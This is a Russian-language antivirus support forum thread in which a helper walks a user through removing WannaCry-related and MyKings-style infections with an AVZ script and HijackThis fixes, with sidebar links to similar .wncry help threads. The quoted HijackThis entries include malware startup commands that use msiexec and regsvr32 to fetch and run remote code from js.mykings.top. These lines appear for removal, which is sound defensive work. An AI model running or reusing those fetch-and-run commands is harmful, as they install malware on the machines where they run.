Перейти к содержанию

Рекомендуемые сообщения

Опубликовано (изменено)

Здравствуйте, проблема такая же как и у  всех,

Изменено пользователем Dysyndyst
Опубликовано

Здравствуйте!

1) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

 

2)

SpyHunter 4 [2017/05/12 22:45:00]-->C:\Users\Павел\AppData\Roaming\Enigma Software Group\sh_installer.exe -r sh

Удалите.


3)

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 SetServiceStart('mssecsvc2.0', 4);
 StopService('mssecsvc2.0');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
 DeleteService('SpyHunter 4 Service');
 DeleteService('mssecsvc2.0');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

4)  - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

 

5)  "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O4 - HKLM\..\Run: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
O4 - HKLM\..\Run: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
O4 - HKU\S-1-5-18\..\RunOnce: [{80655FC2-A38F-4B8C-8775-9A3C68A6C305}] C:\Program Files (x86)\MSI\Live Update\LU5\DL_FILE\Killer_Network_Drivers_1.1.42.1045\Setup.exe /silent (file missing)
O4 - MSConfig\startupreg: [BNM Updater] C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\chp.exe cmd.exe /c ""C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\bash-run.bat" "beeline-wizard-updater"" (file missing) (HKLM) (2014/09/13)
O4 - MSConfig\startupreg: [EPLTarget] (no file)  (2014/09/13)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - ShellIconOverlayIdentifiers: 00avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task (Ready): ParetoLogic Update Version3 - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe (file missing)
O22 - Task (Ready): ParetoLogic Update Version3 Startup Task - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe -StartupTask (file missing)
O22 - Task (Ready): SafeZone scheduled Autoupdate 1468305763 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task (Ready): \AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (file missing)
O22 - Task (Ready): {485346E6-1024-41D8-A0CD-4CA331E36AE9} - C:\Users\Павел\Desktop\directx_Jun2010_redist.exe (file missing)
O22 - Task (Ready): {4AEA447C-98A5-44D0-9CA5-635AD6037838} - G:\Program Files (x86)\From Dust\Titanfall2\__Installer\vc\vc2010sp1\redist\vcredist_x64.exe (file missing)
O22 - Task (Ready): {76A32D2F-D274-4D1D-9B7C-5E3539B3A29E} - G:\Games\Dark Souls III\Game\DarkSoulsIII.exe (file missing)
 
5) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • StVladislav
      Автор StVladislav
      Принесли ноут, из объяснения  "лежал несколько лет, включили там вирус" при запуске увидел окно wana decrypt0r 2.0.
      Что делал:
      - В командной строке от имени администратора "netsh advfirewall firewall addrule dir=in action= blockprotocol=tcp localport=445 name="Block_TCP-445"
      - Убрал галку в автозагрузке.
      - В безопасном режиме удалил скрытую папку в programdata.
      - Почистил папку TEMP.
      - Просканировал с помощью cureit, нашел два файлика и удалил.
      - Просканировал RansomRecovery, не помогло.
      - ShadowExplorer файлов восстановления нет.
       
      Итого имеем множество зашифрованных файлов wncry.
       
      CollectionLog-2018.11.03-15.27.zip
    • dimaflash
      Автор dimaflash
      Здравствуйте. Больше года назад, в мае попал под атаку вируса WannaCry. Вирус поел все мои файлы и папки на рабочем столе. После этого я пропатчил операционку(лицензионная вин7 про х64), расшифровку с заражёнными файлами решил отложить на потом.
       
      Собственно, прошу помощи с расшифровкой. Вирус атаковал рабочий стол и на нём же остановил свою деятельность. С тех пор никаким атакам комп более не подвергался, винда и антивирь регулярно обновляются. 
       
      CollectionLog-2018.11.10-22.01.zip
    • JediMan
      Автор JediMan
      Вчера заметил что к некоторым файлам присвоилось разрешение .WNCRY и они не запускаются, попробывал стереть это разрешение, но файлы все равно не работают( Даже не знаю что теперь делать, дескриптор найти не могу. А также у меня теперь зашифрованы файлы по разработке игры, с которыми я занимаюсь больше 2 месяцев. Надеюсь тут мне кто-то поможет. Также были зашифрованы фотографии из моего детства, которых нету больше нигде
      @Please_Read_Me@.txt
    • set2010
      Автор set2010
      Добрый день, та же проблема... помогите!!! пожалуйста!!! 

      Архив с логами
       
       

      Сообщение от модератора thyrex Перенесено из темы https://forum.kasperskyclub.ru/index.php?showtopic=57641 files.zip
    • edikn
      Автор edikn
      Добрый день! В прошлом году вирус зашифровал файлы с расширением .wncry. Посмотрите пожалуйста может сейчас уже возможно что-нибудь сделать. Спасибо.
      CollectionLog-2018.02.28-15.49.zip
×
×
  • Создать...